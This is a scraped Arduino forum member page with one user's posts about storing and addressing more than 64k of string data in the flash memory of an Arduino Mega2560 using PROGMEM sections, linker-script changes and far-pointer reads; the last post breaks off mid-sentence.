These hooks are triggered while the tag information is extracted from the audio files arename is processing. This is done in two steps. First the Audio::Scan module is used to scan for the raw meta data information from the current file. Then arename's data hash is being filled with that data.
This hook is called right before any scanning has been done. Arguments: 1: the type of the file being processed (`ogg' for ogg vorbis files)
This is triggered as soon as Audio::Scan is done processing the current file, but before arename's data hash has been filled. Arguments: 1: the type of the file being processed (`ogg' for ogg vorbis files), 2: the data structure returned by `Audio::Scan'
When the data hash is being filled it is possible, that for one arename tag (like `artist') multiple values where returned by Audio::Scan. This hook is triggered as soon as such a tag with ambiguous values is processed. The hook may be used for maximum control over how ambiguous values are handled. To do this, the ambiguous value (passed as an array reference in the second argument) should be turned into the desired scalar value. If the array reference is left as it is, the usual `ambiguoususefirst' behaviour is followed. The the option's description for details. Arguments: 1: the name of the tag with the ambiguous value, 2: its current (ambiguous) value, 3: the data hash in its current form (obviously not all values will have been filled in at this point), 4: the data structure returned by Audio::Scan (see its documentation for details)
Finally, the `post_fill' hook is called after the data hash has been filled. This is a good spot, if post-processing the values of individual tag is desired. Arguments: 1: return code of the filling process (`0' in case of an error, `1' otherwise), 2: the type of the file being processed (`ogg' for ogg vorbis files), 3: the data structure returned by `Audio::Scan', 4: the data hash.
Miscellaneous hooks
This is triggered before values from the default_* settings are applied to missing values in the audio file. This hook is only run if a default value for a tag will be used! Arguments: 1: data hash, 2: current key: array of supported tags, 5: the program's argument list
Called at the end of the script. This is reached if nothing fatal happened. Arguments: 1: the program's argument list
This is a very simple example for a hook file, that prints a custom banner and replaces all whitespace in the expanded template with underscores:
sub my_banner { print "Hello World.\n"; } register_hook('startup', \&my_banner);
sub replace_spaces_by_underscore { my ($templateref, $datref) = @_; $$templateref =~ s/\s+/_/g; } register_hook('post_expand_template', \&replace_spaces_by_underscore);
Further examples can be found in the arename.hooks file of the distribution.
find\|(1), xargs\|(1), Audio::Scan.
This manual describes arename version 4.0.
Frank Terbeck <[email protected]>,
Please report bugs.. | https://www.carta.tech/man-pages/man1/arename.1.html | CC-MAIN-2018-51 | refinedweb | 4,392 | 65.42 |
STRNCPY(3P) POSIX Programmer's Manual STRNCPY(3P)
This manual page is part of the POSIX Programmer's Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.
stpncpy, strncpy — copy fixed length string, returning a pointer to the array end
#include <string.h> char *stpncpy(char *restrict s1, const char *restrict s2, size_t n); char *strncpy(char *restrict s1, const char *restrict s2, size_t n);
For strncpy(): The functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1‐2017.
No errors are defined. The following sections are informative.
None..
None.
None.
strcpy(3p), wcsncPY(3P)
Pages that refer to this page: string.h(0p), stpncpy(3p), strcpy(3p), wcsncpy(3p) | https://www.man7.org/linux/man-pages/man3/strncpy.3p.html | CC-MAIN-2022-33 | refinedweb | 152 | 57.67 |
In this section we will discuss about how to convert boolean to String type. This example show you how to convert boolean type to string type. String class provide valueOf() method which is inside java.lang.String package which convert the value into String type.
public class BooleanToString { public static void main(String args[]) { Boolean b=false; String str=String.valueOf(b); System.out.println(str); } }
In the program, valueOf() method of String class is taking boolean type of data and converting into String type which prints the string value.
Advertisements
Posted on: June: Converting Boolean to String
Post your Comment | http://roseindia.net/java/java-conversion/Conversion-BooleanToString.shtml | CC-MAIN-2016-50 | refinedweb | 101 | 66.74 |
Python decorator to measure the execution time of methods
Being a python developer you will always in need for profiling the application. In my current project my goal was figure out the bottleneck in the code. For that i had track the execution time for each methods.
So in the beginning, i started by storing the current time in start_time variable and then i let the method execute and then subtract the start_time with current time to get the actual method execution time as mentioned below:
start_time = int(round(time.time() * 1000))
employees = Employee.get_all_employee_details()
time_diff = current_milli_time() — start_time debug_log_time_diff.update({'FETCH_TIME': time_diff})
There is no issue with the above line of code but you know, this will significantly keep on increasing when you have many method/function call. At one point, it will be difficult to figure out the actual code and what you will see is the repetition of this code.
To overcome this, created the @timeit decorator which allows you to measure the execution time of the method/function by just adding the @timeit decorator on the method.
@timeit decorator:
def timeit(method):
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
te = time.time() if 'log_time' in kw:
name = kw.get('log_name', method.__name__.upper())
kw['log_time'][name] = int((te - ts) * 1000)
else:
print '%r %2.2f ms' % \
(method.__name__, (te - ts) * 1000)
return result return timed
Adding decorator to the method
@timeit
def get_all_employee_details(**kwargs):
print 'employee details'
The code will look like this after removing the redundant code.
logtime_data ={}
employees = Employee.get_all_employee_details(log_time=logtime_data)
Hurray!! All that messy code is gone and now it looks simple and clear.
log_time and log_name are optional. Make use of them accordingly when needed.
Other articles
- Tips to reduce android apk size
- Gravity View-A Sensor Based Library for Android
- Monitor slow redis call
Reference
Python Decorator for execution time
P.S. Thanks for reading this far! If you found value in this, I’d really appreciate it if you recommend this post (by clicking the ❤ button) so other people can see it!.
| https://medium.com/pythonhive/python-decorator-to-measure-the-execution-time-of-methods-fa04cb6bb36d | CC-MAIN-2022-40 | refinedweb | 346 | 56.86 |
In this post I don't want to outline all the changes that happened from v0.7 to the latest, v0.8, release. I want to start by emphasizing that the name of the
DOM namespace had to be changed to
Dom. I know that this may cause some confusion and maybe even frustration, but it is better to do it now, than doing it for the final v1.0 release.
That being said the
DocumentBuilder is still alive. It will probably stay alive and make it in the v1.0 release. It is unclear at the moment, since the builder is still the easiest way to construct a document. However, for v0.9, the
IBrowsingContext will be more interesting. The ideal way will probably involve creating a class that inherits from
Context or just implements
IBrowsingContext. The exact behavior is still to be specified.
Fixed issues
So let's have a look at the great fixes that made it to v0.8:
- v0.8 nearly doubled the number of unit tests. That also covered many CSS selectors, which resulted in fixing (or speeding up) some of them. It seemed like the nth-child selector(s) haven't been working as they should. Now they do! See issue
- AngleSharp fixed a memory leak that will be discussed in detail below. Now AngleSharp is also really lightweight in memory consumption. See issue
- Encoding especially with chinese encodings such as GB18030 was problematic. Now AngleSharp handles all these cases correctly! See issue
- Another encoding issue with wrongly determined Shift_JIS (was in fact UTF-8). Now AngleSharp can handle such edge cases as well! See issue
- A memory leak due to leaving the response open has been handled. See issue
Finished features
AngleSharp v0.8 also fully implemented the
Url (including relative path / scheme detection, directory movements and more) type. Every link can now be normalized and trusted. Besides we now have full HTML5 constraint form validation, i.e. that attributes such as
required are correctly interpreted in dependency of the respective input type. All HTML5 input types (including
datetime and
datetime-local) are implemented according to the official specification. Their stepping behavior is also included.
Besides all those DOM features the parser has been optimized again. It can certainly compete with other solutions. To guarantee not only speed, but also memory efficiency a memory leak has been issued and fixed. It turned out that the code in AngleSharp was only part of the problem. What happened exactly?
Memory leak
The .NET garbage collector does not seem to recognize unconnected documents as being disposable. In the end that does not matter much. What we can do is to dispose the object manually. However, it turns out that this was not sufficient. The connected DOM had to be killed explicitly. So now I am removing all nodes that have been placed on the
Document. That helped a little.
What surprised me was that every spawned task, that had a continuation task, was the source of a massive memory leak. Once a DOM node had a continuation task, it could not be freed any more, resulting in other nodes not being able to be freed, thus starting a vicious circle of high memory consumption.
After just 3 minutes of runtime the memory consumption easily exceeds 100 MB. We also scratch the 100 MB mark if we explicitly dispose the document. In that case the following trend can be observed.
Of course, this is still unacceptable, especially if compared to other solutions like HAP.
In the screenshot above HAP only requires 32 MB after a few minutes. Fixing the issue by disconnecting the elements and replacing all continuation tasks, by elegant
async solutions that take
await, resolved basically all those leaks.
In the end we now have a performance that is practically in the same ballpark as the behavior experienced with HAP. However, it is still required to do the manual call to the
Dispose() method, or to use a
using construct.
Now AngleSharp only consumes 33 MB after 3 minutes, which is basically the same as offered by HAP, however, with a far more complete and accurate DOM, events, observers and much more.
Upcoming developments
The road to v0.9 will also include formal changes. Starting with v0.8 there will be NuGet preview releases, which will be available on a daily or weekly basis. Perhaps these pre-releases will be coupled to the CI system (which is AppVeyor in this case).
Coming with v0.9 or earlier will be a move of the repository. The current AngleSharp repository will be moved to an organization called AngleSharp (surprise!). The repository will then also be split up. Basically every repository will represent a solution and these solutions will communicate via NuGet releases only.
The AngleSharp.Scripting project for instance will become AngleSharp.Scripting.JavaScript, which will be placed in the AngleSharp.Scripting repository. The main idea behind this restructuring is of course to bring in more structure and provide an easier overview for newcomers. Also it should be pretty obvious that parts like the JavaScript engine integration are external projects, which build upon the core AngleSharp project.
Still, AngleSharp is searching contributors and welcomes every contribution. Feel free to write me any time if you are interested. | https://florian-rappl.de/News/Page/280/anglesharp-v08 | CC-MAIN-2020-10 | refinedweb | 881 | 59.09 |
0
Hi there,
I am trying to write a program to send an HTTP request (eventually to view the raw HTML page) but i can't seem to get my requests to send or receive properly, intially when i ran this it would receive about 4190000 bytes (rough guess) but after running it a few times it now receives 0 bytes and i get the following output:
Unable to connect: Socket operation on non-socket
Error sending: Bad file descriptor
1 BYTES SENT.
Error: Bad file descriptor
-1 BYTES RECIEVED.
It seems strange that it was intially able to send data....... although i may have accidentally edited something.
Any ideas? I'm presuming its my code :(
#include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <string.h> #include <stdio.h> int main(){ struct addrinfo hints, *res; int sockfd; // first, load up address structs with getaddrinfo(): memset(&hints, 0, sizeof hints); hints.ai_family = AF_UNSPEC; // use IPv4 or IPv6, whichever hints.ai_socktype = SOCK_STREAM; hints.ai_flags = AI_PASSIVE; // fill in my IP for me getaddrinfo("", "80", &hints, &res); // make a socket: if (sockfd = socket(res->ai_family, res->ai_socktype, res->ai_protocol) == -1) perror("Unable to create socket"); // bind it to the port we passed in to getaddrinfo(): if (connect(sockfd, res->ai_addr, res->ai_addrlen) == -1){ perror("Unable to connect"); close(sockfd); } // send request char *msg = "GET /index.html HTTP/1.1\r\n Host:\r\n"; int len, bytes_sent; len = strlen(msg); if (bytes_sent = send(sockfd, msg, len, 0) == -1) perror("Error sending"); printf("%d",bytes_sent); printf(" BYTES SENT.\n"); //recieve response ssize_t i; ssize_t rcount; char buf[1500]; rcount = read(sockfd, buf, 1500); if (rcount == -1) perror("Error"); printf("%d", rcount); printf(" BYTES RECIEVED.\n"); for (i = 0; i < rcount; i++){ printf("%c", buf[i]); } } | https://www.daniweb.com/programming/software-development/threads/171397/sending-http-requests | CC-MAIN-2016-50 | refinedweb | 294 | 64.1 |
Creation of Webservice using NWDS:
This blog explains:
- How to Create Web Service
- Web Service Navigator
- Log Viewer
Software Prerequisite:
Install Netweaver Development Studio in system.
Create Web Service
To create web service in Netweaver Development Studio (NWDS) by following steps:
Step1:
Creating Dynamic web project in NWDS
Go to New -> project -> Others -> Web Application -> Dynamic Web Applications
Step 2:
Create java class file and write methods
Step3:
Right click the java file, select web services -> create web service.
Web service type will be “Bottom up Java bean web Service, Service implementation will be the java file which you want to create web service.
Step 4:
Select Server hyperlink it open the following window, in that select “SAP Server” ->OK.
Step 5:
Select Web service Runtime hyperlink it opens following window, select “SAP server”
Step 6:
Click “Next” button.
Step 7:
Enter service name and click “Next” button.
Step 8:
Check the correct method name display in Method selection window, if yes click “Next” button.
Step9:
Build Archive file or ear file, Give user name and password for deploying ear file in server.
After published ear successfully in server will get alert message “Deployed completed successfully.
Step10:
Click “Finish” to complete the web service creation in NWDS.
Web Service Navigator
Step1:
Open the page in web browser.
Click “Web Service Navigator”
Step2:
Enter user name and password.
Step3:
Enter the service name in Select service text box and click filter simple, if your service name available clicks the service name.
Step4:
Window open with web service method names contains WSDL URL for web service
Step 5:
Select the method name and open the “Enter input Parameters screen”, enter the values for the methods.
Press “Execute” method to execute the web service, after execution it open result window to display the web service details.
Log Viewer
Step1:
Open:
Step 2:
Press Tab Availability and Performances Management.
Click Log Viewer.
Step 3:
In show dropdown list select Custom view, Select Create new View.
Step4:
For filtering log file select the “Filter by Content” option, select the path as “/Applications/WebServicesCategory”.
hi, I have follwed the steps to create the webservice, but not sucessful.
what input need to be provided in the "Specify Constomizations for the Web Serice" wizard for the filds Service name, port name, port type name and target namespace?
if you could please create a "helloworld" class with one method sayHello and take the screen for each step and post that would be good.
Verry good blog.
Thanks for share that !!!
Thanks Ricardo
Hi Monika,
A great blog, thanks for sharing...
Thanks Gangandeep
Good job
Thanks Sunita
simply superb | https://blogs.sap.com/2014/01/03/creating-webservice-using-sap-nwds/ | CC-MAIN-2021-25 | refinedweb | 439 | 62.88 |
cfsetispeed()
Set the input baud rate in a termios structure
Synopsis:
#include <termios.h> int cfsetispeed( struct termios* termios_p, speed_t speed );
Since:
BlackBerry 10.0.0
Arguments:
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The cfsetispeed() function sets the input baud rate within the termios structure pointed to by termios_p to be speed.
You can get a valid termios control structure for an opened device by calling tcgetattr().
- The new baud rate isn't effective until you call tcsetattr() with this modified termios structure.
- Attempts to set baud rates to values that aren't supported by the hardware are ignored, and cause tcsetattr() to return an error, but cfset).
Errors:
- EINVAL
- One of the arguments is invalid.
- ENOTTY
- This function isn't supported by the system.
Examples:
#include <termios.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> int main( void ) { int fd; struct termios termios_p; speed_t speed; fd = open( "/dev/ser1", O_RDWR ); tcgetattr( fd, &termios_p); /* * Set input baud rate */ speed = 9600; cfsetispeed( &termios_p, speed ); tcsetattr( fd, TCSADRAIN, &termios_p); close( fd ); return EXIT_SUCCESS; }
Classification:
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus | http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/c/cfsetispeed.html | CC-MAIN-2014-49 | refinedweb | 210 | 59.8 |
I wanted to do a Todo List web application that I could pass on to my kids to try. My goal was to give them an introduction to SQL, Web interfaces and Web templating.
For the Todo List application the Python Bottle Web Framework will be used. The Bottle library is a lightweight standalone micro web framework.
To store the Todo list items an SQLite database is used. SQLite is a file based server-less SQL (Structured Query Language) database which is ideal for small standalone applications.
Finally to build Web page, Python web templates will be used. The advantage of using web templates is that is reduces the amount of code written and it separates the presentation component from the backend logic.
Getting Started with Bottle
To install the Python bottle library:
pip install bottle
As a test we can make a program that has a home page (“/”) and a second page, then links can be put on each of the page to move back and forward.
The @route is a decorator that links a URL call, like “/” the home page to a function. In this example a call to the home page “/” will call the home_page() function.
In the home_page() and pages2() functions the return call is used to pass HTML text to the web browser. The anchor tag (<a) is used to define page links.
The run() function will start the Bottle micro web server on:
The output is below.
SQLite
The Python SQLite library is one of the base libraries that is installed with Python.
SQLite has a number of tools and utilities that help manage your databases. One useful light weight application is: DB Browser for SQLite. It is important to note that SQLite data can be view by multiple applications, but for edits/deletes only 1 application can be accessing SQLite.
For the Todo list we’ll start with a simple database structure using three fields:
- Category – this a grouping such as: shopping, projects, activities etc.
- theItem – this is the actual to do item
- id – an unique index for each item. (This will used later for deleting rows)
The Todo database can be created with the SQLite Brower, or in Python code. The code below creates that database, adds a todo table and then inserts some records.
import sqlite3 print("Create a todo list database...") conn = sqlite3.connect('todo.db') # Warning: This file is created in the current directory conn.execute("CREATE TABLE todo (category char(50), theitem char(100),id INTEGER PRIMARY KEY )") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Shopping','eggs')") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Shopping','milk')") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Shopping','bread')") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Activities','snow tires')") conn.execute("INSERT INTO todo (category, theitem) VALUES ('Activities','rack lawn')") conn.commit() print("Database todo.db created")
The DB Browser can be used to view the newly created database.
Viewing the Data in Python
An SQL SELECT command is used to get all the records in the todo database. A fetchall() method is will return all the database rows in a Python tuple variable. Below is the code to write the raw returned data to a browser page.
# Send to raw SQL result to a Web Page # import sqlite3 from bottle import route, run @route('/') def todo_list(): conn = sqlite3.connect('todo.db') c = conn.cursor() c.execute("SELECT * FROM todo") result = c.fetchall() c.close() # note: the SQL results are an array of data (tuple) # send results as a string return str(result) run()
The output formatting can be improved by adding a sort to the SQL SELECT statement and then HTML code are be used to show category heading.
For small applications putting HTML code in the Python code is fine, however for larger web projects it is recommended that the HTML be separated out from the database or backend code.
Web Templates
Web templates allow you to separate the database and back end logic from the web presentation. Bottle has a built-in template engine called Simple Template Engine. I found it did everything that I needed to do. It’s possible to use other Python template libraries, such as Jinja, Mako or Cheetah, if you feel you need some added functionality.
The earlier Python code is simplified by removing the HTML formatting logic. A template object is created with a template name of sometime.tpl). An example would be:
output = template(‘make_table0‘, rows=result, headings = sqlheadings)
Where rows and headings are variable names that are used in the template file. The template file make_table0.tpl is in the working directory.
# # Build a To Do List with a Web Template # import sqlite3 from bottle import route, run, template @route('/') def todo_list(): # Send the output from a select query to a template conn = sqlite3.connect('todo.db') c = conn.cursor() c.execute("SELECT * FROM todo order by category, theitem") result = c.fetchall() # define a template to be used, and pass the SQL results output = template('make_table0', rows=result) return output run()
Templates are HTML pages with inline Python code. Python code can either be in blocks with a <% to start the block and a %> to end the block, or each line can start with %.
Two of the major differences of inline template Python code are:
- indenting the line of Python is not required or used
- control statements like : if and for need an end statement
A template that takes the SQL results and writes each row in a table would look like:
A template that take the SQL results and writes a category heading and lists the items would look like:
Include ADD and DELETE to the Templates
The next step is to include ADD and DELETE functionality.
For the DELETE functionality, a form is added to the existing template. A ‘Delete’ button is placed beside all the Todo items and the button passes the unique index id (row[2]) of the item. The form has a POST request with the action going to the page ‘/delete‘ on the Bottle Web Server.
For the ADD functionality, a new template is created and a %include call is put at the bottom of the main template. (You could also put everything in one file).
The main template now looks like:
The new item template uses a dropdown HTML element with some predefined category options (Activities, Projects and Shopping). The item text will displace 25 characters but more can be entered. Pressing the save button will generate a POST request to the “/new” URL on the Bottle server.
The new_todo.tpl file is:
Bottle Python Code with /add and /delete Routes
The final step is to include routes for the /add and /delete URL references.
The new_item() function gets the category and Todo item from the form in the new_todo template. If the request passes a non-blank item (request.forms.get(“theitem”) then an SQL INSERT command will add a row. The unique item ID is automatically included because this field is defined as an index key.
The delete_item() function reads the unique item id that is passed from the button to issue an SQL DELETE statement.
At the end of the new_item() and delete_item() function the user is redirected back to the home (“/”) page.
# # Build a Todo List # import sqlite3 from bottle import route, run, template, request, redirect, post # The main page shows the Todo list, /new and /delete references are called from this page @route('/') def todo_list(): conn = sqlite3.connect('todo.db') c = conn.cursor() c.execute("SELECT * FROM todo order by category,theitem ") result = c.fetchall() # in case column names are required colnames = [description[0] for description in c.description] numcol = len(colnames) # for now only the rows=result variables are used output = template('show_todo', rows=result, headings=colnames, numcol = numcol) return output # Add new items into the database @route('/new', method='POST') def new_item(): print("New Post:", request.body.read()) theitem = request.forms.get("theitem") newcategory = request.forms.get("newcategory") if theitem != "": conn = sqlite3.connect('todo.db') c = conn.cursor() c.execute("INSERT INTO todo (category,theitem) VALUES (?,?)", (newcategory,theitem)) conn.commit() c.close() redirect("/") # go back to the main page # Delete an item in the database @route('/delete', method='POST') def delete_item(): print("Delete:", request.body.read() ) theid = request.forms.get("delitem").strip() print("theid: ", theid) conn = sqlite3.connect('todo.db') c = conn.cursor() sqlstr = "DELETE FROM todo WHERE id=" + str(theid) print(sqlstr) c.execute(sqlstr) conn.commit() c.close() redirect("/") # go back to the main page run()
The application will look something like:
Final Clean-up
Some of the final clean-up could include:
- enlarge the database to include fields like: status, due date, who is responsible etc.
- add an “Are you sure?” prompt before doing adds and deletes
- verify double entries aren’t included
- include an edit feature
- make the interface slicker
If you want to speed up the performance PyPy can be used instead of the Python interpreter. To use Pypy (after you’ve installed it), you will need to install the pip and bottle:
pypy3 -m ensurepip --user pypy3 -mpip install bottle --user
Final Comments
As I was working on this I found a good BottleTutorial: Todo-List Application. This tutorial approaches the Todo list project differently but it is still a worthwhile reference. | https://funprojects.blog/2020/03/30/sqlite-bottle-todo-list/ | CC-MAIN-2022-40 | refinedweb | 1,555 | 63.8 |
![endif]-->
Arduino
<![endif]-->
Buy
Store
Distributors
Download
Products
Learning
Getting started
Examples
Playground
Reference
Support
Forum
Advanced Search
| Arduino Forum :: Members :: iceowl
Show Posts
Pages: [
1
]
1
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 05, 2013, 10:29:12 pm
OK, the following works:
Using the multi-progmem-segment method
1) Store 64k of strings in PROGMEM_SEG2 (doesn't have to be exact or padded) denoted with a memory start location of 0x20000
2) Store ~64K of strings in PROGMEM_SEG3 denoted with memory start location of 0x30000
3) Store 20k of pointers to those strings in the lowest progmem space with PROGMEM_FAR which goes...I dunno where.
Plz note that you cannot deposit into memory a chunk of data larger than 64k, at least not with this version of avr-gcc/ld in the arduino 1.0.3. I believe this will be different once we get to avr-gcc V4.7...someday...maybe.
The strings can be accessed thus:
Code:
#include <morepgmspace.h>
if(accessing a char* in a string at a location < size of the 64k of stuff in seg 2){
unsigned int index = pgm_read_word_far(GET_FAR_ADDRESS(dictionary0[0]) +wordNumber*2); //wordNumber is the index into the array of strings called dictionary0
strcpy_PX(newWord,index,PROGMEM_SEG2_BASE);
}
else {
unsigned int index = pgm_read_word_far(GET_FAR_ADDRESS(dictionary0[0])+wordNumber*2); //note that the array dictionary0 also has data in SEG3!
strcpy_PX(newWord,index,PROGMEM_SEG3_BASE);
}
char* strcpy_PX(char* des, uint_farptr_t src,unsigned long base)
{
unsigned long p = base + src;
char* s = des;
do {
*s = pgm_read_byte_far(p++);
}
while(*s++);
return des;
}
Note that you cannot access the data in those SEG2/SEG3 locations through specification of an indexed addressing scheme like
Code:
unsigned int index = pgm_read_word_far(GET_FAR_ADDRESS(dictionary0[i]);
I have been utterly unsuccessful in storing and reading out of the SEG 1 location which is denoted with a memory start location of 0x10000. However, I can put 20k of char*s at wherever the attr PROGMEM_FAR puts it. I have to go back to look at the linker script (avr6.x) to see where that's being mapped to. I know it's going into .data (or maybe just past it...)
At least I understand what's happening now. If I try to put anything into PROGMEM_SEG1 I not only get errors trying to read it back, but the bootloader gives me a verification error - which is probably the root cause of the whole problem. I don't have it in me to look into the bootloader at this point... On to another problem!
Cheers to all
Joe
2
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 05, 2013, 01:52:57 am
Hi and thanks all,
I did get my code to work tonite. I divided the data and pointers into 3 segments each of which is less than 64k. There are 2 PROGMEM segments containing a bunch of explicitly initialized strings of the form:
Code:
#include <morepgmspace.h> // and associated mods to ldscript to accommodate the PROGMEM attrs
const char abcde[9] PROGMEM_SEG2 = "aardvark";
And also
Code:
const char fghij[4] PROGMEM_SEG1 = "ant";
And another segment full of pointers to those strings like this
Code:
const char* dictionary[10000] PROGMEM_SEG3= {abcde,fghij,..};
I can pull the chars out of the various segments like this
Code:
char* myWordInSeg2= GET_FAR_ADDRESS(dictionary[0]) + SEG2_OFFSET + index*sizeof(char*);
strcpy_Pseg2(localCharArray,myWordInSeg2); // I wrote the copy to handle addressing from SEG a
It works but I'm durned if I can figure out why...somewhere some 18/24 bit addressing is taking place via ELPM... I may just be lucky because my strings are all loaded sequentially. The char ptrs in SEG3 seem to me to be useless. I think I'm just getting into seg2 and yanking out strings wantonly without guidance from the ptrs in the dictionary array. But somehow this is working. The fact I don't understand it makes me nervous it is not a rigorous solution that only works temporarily.
Anyway.. Onward to Arduweenie land,
Joe
3
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 04, 2013, 06:04:49 pm
Hi Nick
Yes, I have seen in the code <pgmspace.h> and also <morepgmspace.h> where for machines that support ELPM, the macros pgm_read_xxx_far are mapped into ELPM calls instead of LPM.
However, I've yet to determine exactly how to use those. It does seem to work just fine when I have a single 64k block of flash data tagged with the attribute PROGMEM. I think this is true because the following works:
Code:
#include <pgmspace.h>
//...(other includes)
char myString[10];
const char abc[] PROGMEM = "abc";
const char def[] PROGMEM = "def";
const char* abcdef[] PROGMEM = {abc,def};
// ... stuff
for(int i=0;i<2;i++){
strcpy_P(myString,pgm_read_word(&abcdef[i]));
Serial.println(myString);
}
Note the use of strcpy_P is defined in <pgmspace.h>. Note also that I can address the array with a var, which does not seem to be true if you try to create a var in memory space mapped through other means - like the terms PROGMEM_FAR and PROGMEM_SEGx as specified in <morepgmspace.h> In those cases, the compiler seems to want a static situation where you do something like;
Code:
long_address = GET_FAR_ADDRESS(abcdef) + BASE_ADDRESS_OF_MEMORY_SECTION + (which element)*sizeof(int);
strcpy_whatever(myString, pgm_read_word(long_address);
I suppose 24-bit addressing must exist (at least, 18-bit addressing must) exist even to accept an address in that upper 256k...
If I use multiple 64k flash sections or I just try to rely on 24-bit addressing by specifying
Code:
#include <morepgmspace.h>
const variable myVar[70k's worth]... a whole lot of stuff more than 64k
then this does not work...
Code:
int abc = pgm_read_word(&abcdef[i]);
So I am unsure of the occasions when 24-addressing is supported by the current compiler/linker, and when it's not... As I said, it seems that with versions avr-gcc 4.6.2 and 4.7.2 it does not balk at the code which calls more than 64k. But I haven't yet figured out if I can actually make it work with my app. I still have to go back and de-Arduino-ize my Arduino code into pure AVR code to try that in another environment, like AVR-Eclipse or AVR-XCode, which support those compiler versions...
Cheers
Joe
4
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 04, 2013, 12:18:57 pm
...from above
But the important thing to note is that PROGMEM designates that the linker put your data into a space that is 64k in size. If you try to specify data bigger than 64k it might actually compile, but your results are going to be irratic - at least mine were using 1.0.3. Another important thing to note is that the PROGMEM attribute puts the data in a certain place, and only in that place. If you have more than 64k of data, you can put some where PROGMEM says and that spot is 64k big, but then where do you put the rest, and how do you get to it?
Now, just for the sake of discussion - there are lots of flash memory sections, used for different things. You have the .text section, and the .data section, and lots of .fini1, .fini2,.finix...etc. Code and data is marked by the __attribute__((section(".blah"))) tag, and then there is a corresponding note in the linker script that says what to do with things that are in section ".blah".
Some have had success putting data in the section marked with the attribute ".fini7". The AVR documentation says this is a user-definable section, and you can certainly use it to put a 64k chunk. If you have more than 64k you need more than one section.
Well, after much weeping and gnashing of teeth I got a lot of help from this:
which explains how to set up several PROGMEM memory segments/sections. It pushes the static data into flash above the code itself, as is recommended by many. It also provides some code to address those sections. So, using that method which not only required using an include called "morepgmspace.h" - and plz note this is a modified one from Carlos Lamas's original one, as well as making mods to the linker script found as "avr6.x" - which is the script used for chips that have 256k of Flash. Other chips will have different linker scripts.
With that combination of things, I could specify constant global vars with the tags: PROGMEM_SEG1, PROGMEM_SEG2, PROGMEM_SEG3. I can them address them separately through a variety of means. The linker script is modified to place the data in locations which begin at 0x10000, 0x20000, and 0x30000 respectively.
Given that combo of linker script changes and includes I could do the following in code given the way I specified the data above:
Code:
char wordIGot[50];
uint_farptr_t theUltimateAddress = GET_FAR_ADDRESS(myDictionary) + PROGMEM_SEGyadda_BASE_ADDRESS + (indexOfWord*sizeof(char*));
strcpy_Pyadda(wordIGot,pgm_read_byte_far(theUltimateAddress);
Note that I have not yet figured out which strcpy function to use with these addresses, so I wrote my own.
apparently, this also works in some universe but I have not yet got it to work:
Code:
#include <morepgmspace.h>
char myWord[50];
int theIndexOfTheWordIWant;
strcpy_PF(myWord, pgm_get_word_far(&myDictionary[theIndexOfTheWordIWant]));
What I have been unable to accomplish at this point, is that I cannot retrieve the char* pointers from the array of 10000 pointers I specified as "dictionary[]" above.
Just for sake of example, I have stored 64k of strings in the memory noted with the attribute PROGMEM_SEG2. I have stored the 10000 pointers to that data in PROGMEM_SEG1.
I am presuming these char* pointers are all 16-bit, so that they are addresses to the char strings all WITHIN the same memory segment, and that I will have to do something of the order of:
Code:
#include <morepgmspace.h> // note this is the MODIFIED one available on avrfreaks.com, not the original from Carlos Lamas's website
uint16_t theLocalAddress = pgm_read_word_far(&dictionaryWhichIsInSeg1[which word do I want]);
//but as I mentioned the above line doesn't seem to work always, as you can't retrieve the dictionary address through variable indexing.
//In that case, you have to do this..
uint16_t theLocalAddress = pgm_read_word_far(GET_FAR_ADDRESS(dictionary) + PROGMEM_SEG1_BASE + whichWordDoIWant*sizeof(char*));
//but I'm not sure how well that works either
then
Code:
char* theRealAddress = pgm_read_word_far(theLocalAddress + PROGMEM_SEG2_BASE);
However, I think I may be in some sort of compiler optimization hell. It seems impossible to retrieve the pointers to the const char*s with pgm_read_word_far...but I can get to the words themselves, which are stored sequentially in PROGMEM_SEG2 and thus seem like one big long string.
I also ran into the perennial issue with the Mega2560 bootloader hanging...the new version of the bootloader hex does seem to work but I wind up with a problem on verification. It gives me a warning, but the code loads just fine.
If anyone followed all that, thanks much for your valuable time.
With kind regards
Joe
5
Using Arduino
/
Programming Questions
/
Re: Just a newby asking the 64k question again - Arduino Mega2560
on: February 04, 2013, 12:18:34 pm
Ok. Progress after many hours of bashing. I promised to report back, and I am.
Consider this my engineering notebook of sorts. I'm not trying to instruct you experts, but rather, just recording my experiences. I know I do not have a complete understanding yet but this is as far as I got. I need more info - particularly on memory sections and addressing. But Maybe this will be valuable to someone.
My application is that I am putting a dictionary of 10k words into an Arduino Mega2560 and accessing it through some means for display on an LCD. My IDE is (mostly) the Arduino 1.0.3, and I'm primarily using MacOSX v10.6. What I eventually got to work was on that system.
I also tried compile/link/load sequence from the command line using avr-gcc 4.6.2 and 4.7.2. I tried the AVR environment on Eclipse and also on Mac XCode. Results varied in different ways with all those methods. In all cases I'm using the most version of avrdude (I forget which) that comes with 1.0.3, and also which is obtained when you fetch it on MacOSX with macports or fink. It's the same version in all cases.
I'm pretty confident that the combination of 4.7.2 and XCodeAVR or EclipseAVR would give me an entirely different experience than the ArduinoIDE. However I didn't do more than blinky-with-big-global-vars on any of those because I didn't have the time/patience to go back and recast all my Arduino code in native AVR speak. However I was very successful in compiling and linking to a .hex that contained flash/global data structures larger than 64k. I did not attempt to access those, though.
Things learned:
